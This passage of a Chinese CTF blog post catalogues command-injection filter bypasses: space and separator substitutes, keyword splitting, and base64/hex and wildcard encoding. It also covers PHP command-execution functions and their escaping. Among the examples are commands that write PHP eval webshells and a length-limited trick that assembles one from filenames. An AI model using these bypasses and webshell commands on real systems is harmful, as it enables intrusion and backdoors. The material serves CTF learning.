<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br></pre></td><td class="code"><pre><span class="line">ubuntu@VM-12-3-ubuntu:~$ echo $((~$(())))</span><br><span class="line">-1</span><br><span class="line">ubuntu@VM-12-3-ubuntu:~$ echo $((~0))</span><br><span class="line">-1</span><br><span class="line">ubuntu@VM-12-3-ubuntu:~$ echo $((~1))</span><br><span class="line">-2</span><br><span class="line">ubuntu@VM-12-3-ubuntu:~$ echo $((~11))</span><br><span class="line">-12</span><br><span class="line">ubuntu@VM-12-3-ubuntu:~$ echo $((1&lt;&lt;1))</span><br><span class="line">2</span><br><span class="line">ubuntu@VM-12-3-ubuntu:~$ echo $((1&lt;&lt;1&lt;&lt;1))</span><br><span class="line">4</span><br><span class="line">ubuntu@VM-12-3-ubuntu:~$ echo $((2#10001))</span><br><span class="line">17</span><br><span class="line">ubuntu@VM-12-3-ubuntu:~$ echo $(( $((1&lt;&lt;1))#10001 ))</span><br><span class="line">17</span><br><span class="line"></span><br></pre></td></tr></table></figure>
<h3 id="命令执行中的各种绕过"><a href="#命令执行中的各种绕过" class="headerlink" title="命令执行中的各种绕过"></a>命令执行中的各种绕过</h3></li>
</ol>
<p>在ctf中，命令执行一直是一个非常重要的考点，一道ctf题最后往往都需要我们执行命令来拿到flag，但一般都会有各种各样的过滤限制，接下来就来总结一下如何绕过这些过滤</p>
<h4 id="绕过空格"><a href="#绕过空格" class="headerlink" title="绕过空格"></a>绕过空格</h4><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">&lt;&gt;        --   重定向，如cat&lt;&gt;flag.php</span><br><span class="line">&#123;cat,flag&#125; --  花括号拓展</span><br><span class="line">%09      --  需要php环境，如cat%09flag.php</span><br><span class="line">$&#123;IFS&#125;   --  单纯cat$IFS2,IFS2被bash解释器当做变量名，输不出来结果，加一个&#123;&#125;就固定了变量名，如cat$&#123;IFS2&#125;flag.php</span><br><span class="line">$IFS$9  --  后面加个$与&#123;&#125;类似，起截断作用，$9是当前系统shell进程第九个参数持有者，始终为空字符串，如cat$IFS2$9flag.php</span><br></pre></td></tr></table></figure>
<h4 id="绕过分隔符"><a href="#绕过分隔符" class="headerlink" title="绕过分隔符"></a>绕过分隔符</h4><p><strong>windows</strong>：</p>
<p>‘|’  在前面命令的结果上，执行后面的指令<br>‘||’ 如果前面命令是错的那么就执行后面的语句，否则只执行前面的语句<br>‘&amp;&amp;’ 如果前面为假，后面的命令也不执行，如果前面为真则执行两条命令，例如<code>?cmd=cd ..&amp;&amp;ls&amp;&amp;ca$@t ffff$@llllaaaaggggg</code></p>
<p>‘&amp;’  前面和后面命令都要执行，无论前面真假</p>
<p><strong>Linux</strong>:<br>Linux系统包含了windows系统上面四个之外，还多了一个 ‘;’ 这个作用和 ‘&amp;’ 作用相同</p>
<h4 id="绕过关键字"><a href="#绕过关键字" class="headerlink" title="绕过关键字"></a>绕过关键字</h4><ol>
<li>字符拆分绕过</li>
</ol>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">ls -&gt; l\s</span><br><span class="line">ls -&gt; l&quot;&quot;s</span><br><span class="line">ls -&gt; l``s</span><br><span class="line">cat /flag -&gt; ca\t /flag -&gt; c\a\t /flag</span><br><span class="line">cat /flag -&gt; ca&quot;&quot;t /flag -&gt; c&quot;&quot;a&quot;&quot;t /flag</span><br><span class="line">cat /flag -&gt; ca``t /flag -&gt; c``a``t /flag</span><br></pre></td></tr></table></figure>
<ol start="2">
<li>拆分命令绕过</li>
</ol>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">ls -&gt; a=l;b=s;$a$b</span><br><span class="line">cat /flag -&gt; a=ag;b=fl;cat /$b$a;</span><br><span class="line">flag -&gt; a=faa;b=lage;$&#123;a:0:1&#125;$&#123;a:1:1&#125;$&#123;b:1:1&#125;$&#123;b:3:1&#125;或者$&#123;a:0:1&#125;$&#123;b:0:3&#125;  </span><br><span class="line"></span><br></pre></td></tr></table></figure>
<ol start="3">
<li>编码绕过</li>
</ol>
<p>1.base64</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">echo &#x27;cat&#x27; | base64  --&gt; Y2F0Cg==</span><br><span class="line">那我们就可以构造 cat /flag为：</span><br><span class="line">`echo Y2F0Cg== | base64 -d` /flag</span><br><span class="line"></span><br><span class="line">echo PD9waHAgQGV2YWwoJF9QT1NUWydjbWQnXSkgPz4=|base64 -d&gt; shell.php</span><br><span class="line">注入后门,密码为cmd</span><br></pre></td></tr></table></figure>
<p>2.hex</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">echo 77686F616D69 | xxd -r -p | bash </span><br><span class="line">其中77686F616D69是whoami的hex编码</span><br><span class="line"></span><br><span class="line">echo 636174202f666c6167 | xxd -r -p|bash </span><br><span class="line">其中636174202f666c6167是cat /flag的hex编码</span><br></pre></td></tr></table></figure>

<ol start="4">
<li>通配符绕过(与正则类似)</li>
</ol>
<p>在执行命令前，包含通配符的字符串将转换成匹配到的文件名，文件名按照字母顺序排列，以空格隔开</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">*	              匹配任意长度字符</span><br><span class="line">？	            匹配任意一个字符</span><br><span class="line">[abcd]	        匹配abcd中的一个字符</span><br><span class="line">[a-z]	          匹配a-z中任意一个字符</span><br><span class="line">[!abcd]	        不匹配括号中的任意一个字符</span><br><span class="line">[^a-z]	        不匹配a-z中任意一个字符</span><br><span class="line">&#123;*.zip,a*.txt&#125;：&#123;&#125;表示一个集合，命令含义是列出所有以zip结尾的文件和所有a开头的txt文件</span><br></pre></td></tr></table></figure>
<p>linux下命令其实也是文件比如说像cat就对应文件/bin/cat，ls就对应文件/bin/ls等等，我们也可以用类似的方法进行构造：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">ls -&gt;  /bin/l?</span><br><span class="line">cat -&gt; /bin/c??</span><br><span class="line"></span><br><span class="line">像preg_match(&quot;/.*f.*l.*a.*g.*/&quot;, $ip)这种flag字样都是被过滤了的，我们用通配符就很好用：</span><br><span class="line">cat /flag -&gt; /bin/ca? /????</span><br></pre></td></tr></table></figure>
<ol start="5">
<li>使用空变量绕过<br>变量说明:<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line">$$    ——脚本运行的当前进程号（ProcessID）</span><br><span class="line">$!    ——后台运行的最后一个进程的ID</span><br><span class="line">$?    ——显示最后命令的退出状态。结果为0表示执行正常，结果为1表示执行异常；</span><br><span class="line">$#    ——参数个数</span><br><span class="line">$0    ——Shell本身的文件名,在命令行中使用为bash</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">注：因为在没有传参的情况下，下面的特殊变量都是为空的</span><br><span class="line">$∗     ——所有参数列表。以&quot;$1 $2 … $n&quot;的形式输出所有参数。</span><br><span class="line">$@     ——所有参数列表。以&quot;$1&quot; “2&quot;…&quot;2&quot;…&quot;n” 的形式输出所有参数。</span><br><span class="line">$1～n  ——添加到Shell的各参数值。$1是第1参数、$2是第2参数…。</span><br><span class="line"></span><br></pre></td></tr></table></figure></li>
</ol>
<h4 id="绕过长度限制"><a href="#绕过长度限制" class="headerlink" title="绕过长度限制"></a>绕过长度限制</h4><p>将命令写入文件并拼接，用sh执行文件</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br><span class="line">90</span><br><span class="line">91</span><br><span class="line">92</span><br><span class="line">93</span><br><span class="line">94</span><br><span class="line">95</span><br><span class="line">96</span><br><span class="line">97</span><br><span class="line">98</span><br><span class="line">99</span><br><span class="line">100</span><br><span class="line">101</span><br><span class="line">102</span><br><span class="line">103</span><br><span class="line">104</span><br><span class="line">105</span><br><span class="line">106</span><br><span class="line">107</span><br><span class="line">108</span><br></pre></td><td class="code"><pre><span class="line">1. 直接写入命令                     (13)</span><br><span class="line">root@kali:~# echo &quot;ca\\&quot;&gt;cmd</span><br><span class="line">root@kali:~# echo &quot;t\\&quot;&gt;&gt;cmd</span><br><span class="line">root@kali:~# echo &quot; fl\\&quot;&gt;&gt;cmd</span><br><span class="line">root@kali:~# echo &quot;ag&quot;&gt;&gt;cmd  </span><br><span class="line">root@kali:~# cat cmd          </span><br><span class="line">ca\                             </span><br><span class="line">t\</span><br><span class="line"> fl\</span><br><span class="line">ag</span><br><span class="line">root@kali:~# sh cmd</span><br><span class="line">this is your flag</span><br><span class="line">2. 利用文件名写入特殊命令</span><br><span class="line">root@kali:~/example# &gt;ag					</span><br><span class="line">root@kali:~/example# &gt;fl\\</span><br><span class="line">root@kali:~/example# &gt;t\ \\</span><br><span class="line">root@kali:~/example# &gt;ca\\</span><br><span class="line">root@kali:~/example# ls -t</span><br><span class="line">&#x27;ca\&#x27;  &#x27;t \&#x27;  &#x27;fl\&#x27;   ag   flag</span><br><span class="line">root@kali:~/example# ls -t&gt;a       (7)</span><br><span class="line">root@kali:~/example# sh a  #sh会把a里面的每行内容当作命令来执行</span><br><span class="line">a: 1: a: not found</span><br><span class="line">this is your flag</span><br><span class="line">a: 6: flag: not found</span><br><span class="line">3. 临时文件执行</span><br><span class="line">url = &quot;http://a9320a52-4229-4dab-aa2b-9193c06c95e1.challenge.ctf.show/&quot;​</span><br><span class="line">def getFlag():​</span><br><span class="line">  file=&#123;​</span><br><span class="line">  &quot;file&quot;:&quot;#!/bin/sh\ncat /f*&gt;/var/www/html/1.txt&quot;​</span><br><span class="line">  &#125;​</span><br><span class="line">​</span><br><span class="line">  data=&#123;​</span><br><span class="line">    &quot;cmd&quot;:&quot;. /t*/*&quot;​                (7)</span><br><span class="line">  &#125;​</span><br><span class="line">  response = requests.post(url=url+&quot;api/tools.php&quot;,files=file,data=data)​</span><br><span class="line">  </span><br><span class="line">4. 读取文件                         (7)</span><br><span class="line">ls / &gt;a</span><br><span class="line">nl /*&gt;a</span><br><span class="line"></span><br><span class="line">------------------------------------------------------------------------------------------------------</span><br><span class="line">                                    (5)</span><br><span class="line">5. 使用dir和通配符写入命令</span><br><span class="line">root@kali:~/example# &gt;dir</span><br><span class="line">root@kali:~/example# &gt;f\&gt;</span><br><span class="line">root@kali:~/example# &gt;ht-</span><br><span class="line">root@kali:~/example# &gt;sl</span><br><span class="line">root@kali:~/example# *&gt;v  (等同于命令：dir &quot;f&gt;&quot; &quot;ht‐&quot; &quot;sl&quot; &gt; v )</span><br><span class="line">root@kali:~/example# &gt;rev </span><br><span class="line">root@kali:~/example# *v&gt;0 前面的*v等同于命令rev v，相当于将v中的文件内容倒了回来，变回:ls -th &gt;f</span><br><span class="line">然后将倒转后的内容写入文件0中，文件0中的内容为:ls -th &gt;f</span><br><span class="line">4. 利用3命令注入php一句话木马</span><br><span class="line">&gt;dir</span><br><span class="line">&gt;0\&gt;</span><br><span class="line">&gt;ht-</span><br><span class="line">&gt;sl</span><br><span class="line">*&gt;v</span><br><span class="line">&gt;rev </span><br><span class="line">*v&gt;a</span><br><span class="line">&gt;hp</span><br><span class="line">&gt;p\\</span><br><span class="line">&gt;1.\\</span><br><span class="line">&gt;\&gt;\\</span><br><span class="line">&gt;-d\\</span><br><span class="line">&gt;\ \\</span><br><span class="line">&gt;64\\</span><br><span class="line">&gt;se\\</span><br><span class="line">&gt;ba\\</span><br><span class="line">&gt;\|\\</span><br><span class="line">&gt;\=\\</span><br><span class="line">&gt;w=\\</span><br><span class="line">&gt;pO\\</span><br><span class="line">&gt;V0\\</span><br><span class="line">&gt;bM\\</span><br><span class="line">&gt;1R\\</span><br><span class="line">&gt;PU\\</span><br><span class="line">&gt;1B\\</span><br><span class="line">&gt;kX\\</span><br><span class="line">&gt;Cg\\ </span><br><span class="line">&gt;hb\\</span><br><span class="line">&gt;XZ\\</span><br><span class="line">&gt;gZ\\</span><br><span class="line">&gt;HA\\</span><br><span class="line">&gt;a\\</span><br><span class="line">&gt;9w\\</span><br><span class="line">&gt;PD\\</span><br><span class="line">&gt;S&#125;\\</span><br><span class="line">&gt;IF\\</span><br><span class="line">&gt;&#123;\\</span><br><span class="line">&gt;\$\\</span><br><span class="line">&gt;o\\</span><br><span class="line">&gt;ch\\</span><br><span class="line">&gt;e\\</span><br><span class="line">sh a</span><br><span class="line">sh 0</span><br><span class="line"></span><br><span class="line">文件a中的内容为:ls -th &gt;0</span><br><span class="line">文件0中的内容为:</span><br><span class="line">echo$&#123;IFS&#125;PD9waHAgZXZhbCgkX1BPU1RbMV0pOw==|base64 -d&gt;1.php</span><br><span class="line">0</span><br><span class="line">rev</span><br><span class="line">v</span><br><span class="line">sl</span><br><span class="line">ht‐</span><br><span class="line">f&gt;</span><br><span class="line">dir</span><br><span class="line">空格要用$&#123;IFS&#125;来代替，避免一句话中存在两个空格</span><br><span class="line">文件1.php成功生成后的内容为:&lt;?php eval($_POST[1]);</span><br></pre></td></tr></table></figure>


<h3 id="php命令执行函数"><a href="#php命令执行函数" class="headerlink" title="php命令执行函数"></a>php命令执行函数</h3><p><img src="https://cdn.jsdelivr.net/gh/mayylu/pic@main/blogs/QQ%E6%88%AA%E5%9B%BE20220715211205.png" alt="QQ截图20220715211205"></p>
<p>实例</p>
<ol>
<li><p><strong>``</strong><br>里内容作为shell命令来执行,如echo `ls`;<br>底层为shell_exec</p>
</li>
<li><p>system()函数可以执行系统命令, 并将命令执行的结果直接输出到界面<br><code>system(&#39;ls&#39;)</code></p>
</li>
<li><p>exec()函数是被禁用的,先是 要关掉 安全模式 <code>safe_mode = off</code><br>exec(‘ls’,$result);如果result数组中已经包含了部分元素，exec() 函数会在数组末尾追加内容<br><code>exec(&#39;ls&#39;,$result); print_r($result);</code></p>
</li>
<li><p>shell_exec()函数可以执行系统命令, 但它不会直接输出执行的结果, 而是返回一个字符串类型的变量来存储系统命令的执行结果<br><code>echo shell_exec(&#39;ls&#39;)</code></p>
</li>
<li><p>passthru()函数可以执行系统命令, 并将执行结果输出到页面中, 与system()函数不同的是, 它支持二进制的数据, 更多的用于文件, 图片等操作<br><code>passthru(&#39;ls&#39;)</code></p>
</li>
<li><p>popen()函数可以执行系统命令, 但不会输出执行的结果, 而是返回一个资源类型的变量用来存储系统命令的执行结果<br>$result = popen( ‘ls’ , ‘r’ );参数’1’:字符串类型,需要执行的命令,;参数2:字符串类型,模式 ;返回值:资源类型,命令执行的结果<br><code>$result = popen( &#39;ls&#39;,&#39;r&#39; ); echo fread( $result , 100 );</code></p>
</li>
</ol>
<h3 id="php命令执行绕过"><a href="#php命令执行绕过" class="headerlink" title="php命令执行绕过"></a>php命令执行绕过</h3><p>PHP内置的命令执行函数（如shell_exec、system），都只接受一个“字符串”作为参数。而在内核中，这个字符串将被直接作为一条shell命令来调用，这种情况下就极为容易出现命令注入漏洞。</p>
<p>由于这个特点，PHP特别准备了两个过滤函数：</p>
<pre><code>escapeshellcmd
escapeshellarg
</code></pre>
<p>二者分工不同.</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">escapeshellarg — 把字符串转码为可以在 shell 命令里使用的参数</span><br><span class="line"></span><br><span class="line">功能 ：escapeshellarg() 将给字符串增加一个单引号并且能引用或者转码任何已经存在的单引号，这样以确保能够直接将一个字符串传入 shell 函数，shell 函数包含 exec(), system() 执行运算符(反引号)</span><br></pre></td></tr></table></figure>
<p><img src="https://cdn.jsdelivr.net/gh/mayylu/pic@main/blogs/l4sij.png" alt="l4sij"></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line"></span><br><span class="line">escapeshellcmd — shell 元字符转义</span><br><span class="line"></span><br><span class="line">功能：escapeshellcmd() 对字符串中可能会欺骗 shell 命令执行任意命令的字符进行转义。 此函数保证用户输入的数据在传送到 exec() 或 system() 函数，或者 执行操作符 之前进行转义。</span><br><span class="line"></span><br><span class="line">反斜线（\）会在以下字符之前插入： &amp;#;`|\?~&lt;&gt;^()[]&#123;&#125;$*, \x0A 和 \xFF*。 *’ 和 “ 仅在不配对儿的时候被转义。 </span><br><span class="line">在 Windows 平台上，所有这些字符以及 % 和 ! 字符都会被空格代替。</span><br><span class="line"></span><br></pre></td></tr></table></figure>
<p>如果是先用 escapeshellarg 函数过滤,再用的 escapeshellcmd 函数过滤<br><img src="https://cdn.jsdelivr.net/gh/mayylu/pic@main/blogs/se6sc.png" alt="se6sc"></p>

    </div>

    
    
    

    <footer class="post-footer">
          <div class="post-tags">
              <a href="/tags/rce/" rel="tag"># rce</a>
          </div>

        

          <div class="post-nav">
            <div class="post-nav-item">
                <a href="/2022/07/11/php%E5%AE%A1%E8%AE%A1%E5%9F%BA%E7%A1%80/" rel="prev" title="php审计基础">
                  <i class="fa fa-chevron-left"></i> php审计基础
                </a>
            </div>
            <div class="post-nav-item">
                <a href="/2022/07/15/text/text/" rel="next" title="text">
                  text <i class="fa fa-chevron-right"></i>
                </a>
            </div>
          </div>
    </footer>
  </article>
</div>






</div>
  </main>

  <footer class="footer">
    <div class="footer-inner">


<div class="copyright">
  &copy; 
  <span itemprop="copyrightYear">2023</span>
  <span class="with-love">
    <i class="fa fa-heart"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">mayylu</span>
</div>
  <div class="powered-by">由 <a href="https://hexo.io/" rel="noopener" target="_blank">Hexo</a> & <a href="https://theme-next.js.org/pisces/" rel="noopener" target="_blank">NexT.Pisces</a> 强力驱动
  </div>

    </div>
  </footer>

  
  <script size="300" alpha="0.6" zIndex="-1" src="https://cdn.jsdelivr.net/npm/ribbon.js@1.0.2/dist/ribbon.min.js"></script>
  <script src="https://cdn.jsdelivr.net/npm/animejs@3.2.1/lib/anime.min.js" integrity="sha256-XL2inqUJaslATFnHdJOi9GfQ60on8Wx1C2H8DYiN1xY=" crossorigin="anonymous"></script>
<script src="/js/comments.js"></script><script src="/js/utils.js"></script><script src="/js/motion.js"></script><script src="/js/next-boot.js"></script>

  





  





</body>
</html>
